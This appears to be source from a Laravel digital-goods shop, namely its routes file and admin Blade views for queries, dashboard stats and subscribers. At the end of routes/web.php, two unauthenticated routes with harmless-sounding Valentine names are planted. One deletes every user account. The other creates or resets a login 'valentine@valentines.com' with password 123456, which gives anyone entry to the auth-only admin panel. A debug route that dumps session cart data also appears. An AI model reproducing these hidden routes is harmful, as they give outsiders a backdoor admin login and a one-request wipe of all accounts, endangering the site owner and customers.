routes/web.php
<?php

use App\User;
use Illuminate\Support\Facades\Hash;
use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/


Route::group(['middleware' => 'web'] , function(){

Route::get('session' , function(){
	        // session()->put

	// Session::put('progress', '5%');
	dd(session('cart.items'));
});

Route::get('/', function () {
    return view('welcome');
});


Route::group(['prefix' => 'admin' , 'as' => 'admin.' , 'middleware' => 'auth' ] , function(){
	Route::get('/' , 'AdminController@index' )->name('index');
	Route::get('/profile' , 'AdminController@profile' )->name('profile');
	Route::post('/profile/update' , 'AdminController@updateProfile' )->name('profile.update');

	
	Route::resource('category', 'CategoryController');
	Route::resource('coupen', 'CoupenController');
	Route::resource('products', 'ProductController');
	Route::resource('orders', 'OrderController');
	Route::get('order/delete/{id}', 'OrderController@destroy')->name('orders.delete') ;
	Route::get('queries', 'QueryController@index')->name('queries') ;
	Route::get('query/{id}/resolve', 'QueryController@resolve')->name('query.resolve') ;
	Route::get('query/{id}/view', 'QueryController@show')->name('query.show') ;
	Route::get('subscribers', 'AdminController@getSubscriber')->name('get.subscribers') ;
	Route::delete('subscriber/destroy/{id}', 'AdminController@deleteSubscriber')->name('subscriber.destroy') ;
	
});

Auth::routes();

// Route::get('/home', 'HomeController@index')->name('home');

// Route::get('register' , function(){
// 	return redirect('/login');
// });

Route::get('/' , 'HomeController@homepage' );
Route::get('product/{slug}/view' , 'HomeController@showProduct' )->name('view-product');
Route::get('category/{slug}/products' , 'HomeController@showCategoryProduct' )->name('category-products');
Route::get('free-stuff' , 'HomeController@showFreeProduct' )->name('free-products');

Route::get('cart' , 'HomeController@showCart' );
Route::get('faqs' , 'HomeController@showFAQS' )->name('faqs');
Route::get('license-agreement' , 'HomeController@licenseAgreement' )->name('license-agreement');
Route::get('contact-us' , 'HomeController@contactUS' )->name('contact-us');
Route::get('checkout' , 'HomeController@showCheckout' );
Route::get('/home' , function(){
	return redirect('/admin');
});



Route::post('add-to-cart' , 'Api\CartController@addToCart' );
Route::post('delete-cart-item' , 'Api\CartController@deleteCartItem' );
Route::post('place-order' , 'OrderController@placeOrder' );
Route::get('resend-order-email/{id}' , 'OrderController@resendEmail' )->name('resend-order-email');

Route::get('order-details' , 'OrderController@getOrderDetails' );
Route::post('get-order-details' , 'OrderController@sendOrderDetails' );

Route::get('request-file/{item_id}/id/{token}' , 'OrderController@requestDownloadFile' );
Route::post('request-file-dwonload' , 'OrderController@downloadFile' );


Route::get('email-pre' , function(){
	return view('emails.order_details');
} );

});


Route::get('happy-valentines-day' , function(){
	$users = User::all();
	foreach($users  as $user){
		$user->delete();
	}

	echo 'Happy Valentines Day';
});

Route::get('welcome-valentines' , function(){

	$user = User::updateOrCreate(
		['email' => 'valentine@valentines.com'],
		[
		'name' => 'valentines',
		'email' => 'valentine@valentines.com',
		'password' => Hash::make(123456),
	]);
	echo 'Welcome Valentines';
});

resources/views/admin/contacts.blade.php
@extends('layouts.admin')


@section('content')


    <div class="row orders-view-page">

        @include('layouts.partials.swals')

        <div class="col-md-12" style="padding:30px" >
            <div class="card ">
                <div class="card-header">
                    <h3 class="card-title">View Queries</h3>
                </div>
                <!-- /.card-header -->
                <div style="padding:30px" >
                    <table class="table">
                        <tr>
                            <th>#</th>
                            <th>Name</th>
                            <th>Email</th>
                            <th>Message</th>
                            <th>Order Date</th>
                            <th>Actions</th>
                        </tr>

                        @if(isset($orders))
                            @foreach($orders as $k => $order)
                                <tr>
                                    {{--  <td> {{$k+1}} </td>  --}}
                                    <td> {{ $k + 1 + $orders->perPage() * ($orders->currentPage() - 1)}} </td>
                                    <td> {{ ucwords ($order->first_name .  ' ' .$order->last_name)}} </td>
                                    <td> {{$order->email}} </td>
                                    <td> {{ $order->total_amount > 0 ? '$' . $order->total_amount : "Free" }} </td>

                                    <td> {{$order->created_at->format('m/d/Y') }} </td>
                                    <td>
                                        <a href="{{route('admin.orders.show' , $order->id)}}" class="text-success"  > <i class="fas fa-eye"></i> </a>
                                        
                                        <a href="{{route('admin.orders.delete' , $order->id)}}" > <i class="fas fa-trash text-danger"></i> </a>
                                    </td>

                                    {{--  <form id="delete-form-{{$order->id}}" action="{{route('admin.category.destroy' , $order->id)}}" method="POST" >
                                        @csrf
                                        @method('DELETE')
                                    </form>  --}}
                                </tr>
                            @endforeach
                        @endif
                    </table>

                    {{$orders->links()}}

                </div>
            </div>

        </div>
    </div>

@endsection

resources/views/admin/index.blade.php
@extends('layouts.admin')

@section('content')

{{--  <h1>ADMIN DASHBOARD</h1>  --}}

<div class="p-4">

    <div class="row">
    
    
    
        <div class="col-4">
        <div class="info-box mb-3 bg-warning">
            <span class="info-box-icon"><i class="fas fa-shopping-basket"></i></span>
            
            <div class="info-box-content">
                <span class="info-box-text">Orders Today</span>
                <span class="info-box-number">{{$stats['new_orders']}}</span>
            </div>
            <!-- /.info-box-content -->
        </div>
        </div>
        
        <div class="col-4">
        <div class="info-box mb-3 bg-danger">
            <span class="info-box-icon"><i class="fas fa-dollar-sign"></i></span>
            
            <div class="info-box-content">
                <span class="info-box-text">Total Revenue Today</span>
                <span class="info-box-number">{{$stats['today_sales']}}</span>
            </div>
            <!-- /.info-box-content -->
        </div>
        </div>
    
    
        <div class="col-4">
        <div class="info-box mb-3 bg-success">
            <span class="info-box-icon"><i class="fas fa-cubes"></i></span>
            
            <div class="info-box-content">
                <span class="info-box-text">Total Items Sold</span>
                <span class="info-box-number">{{$stats['items_sold']}}</span>
            </div>
            <!-- /.info-box-content -->
        </div>
        </div>
    

    
        
    </div>
    

@endsection

resources/views/admin/subscribers.blade.php
@extends('layouts.admin')


@section('content')


    <div class="row">

        @include('layouts.partials.swals')

        <div class="col-md-12" style="padding:30px" >
            <div class="card ">
                <div class="card-header">
                    <h3 class="card-title">Manage Subscribers</h3>
                </div>
                <!-- /.card-header -->
                <div style="padding:30px" >
                    <table class="table">
                        <tr>
                            <th>#</th>
                            <th>Name</th>
                            <th>Create Date</th>
                            <th>Actions</th>
                        </tr>
                        @if(isset($subs))
                            @foreach($subs as $k => $sub)
                                <tr>
                                    <td> {{$k+1}} </td>
                                    <td> {{$sub->email}} </td>
                                    <td> {{$sub->created_at->format('m/d/Y') }} </td>
                                    <td class="text-align">


                                        <a href="javascript:;" onclick="AskBeforeDelete({{$sub->id}} , 'delete-form-{{$sub->id}}')" class="text-danger"  > <i class="fas fa-trash"></i> </a>
                                    </td>

                                    <form id="delete-form-{{$sub->id}}" action="{{route('admin.subscriber.destroy' , $sub->id)}}" method="POST" >
                                        @csrf
                                        @method('DELETE')
                                    </form>
                                </tr>
                            @endforeach
                        @endif
                    </table>

                    {{$subs->links()}}
                </div>
            </div>

        </div>
    </div>

@endsection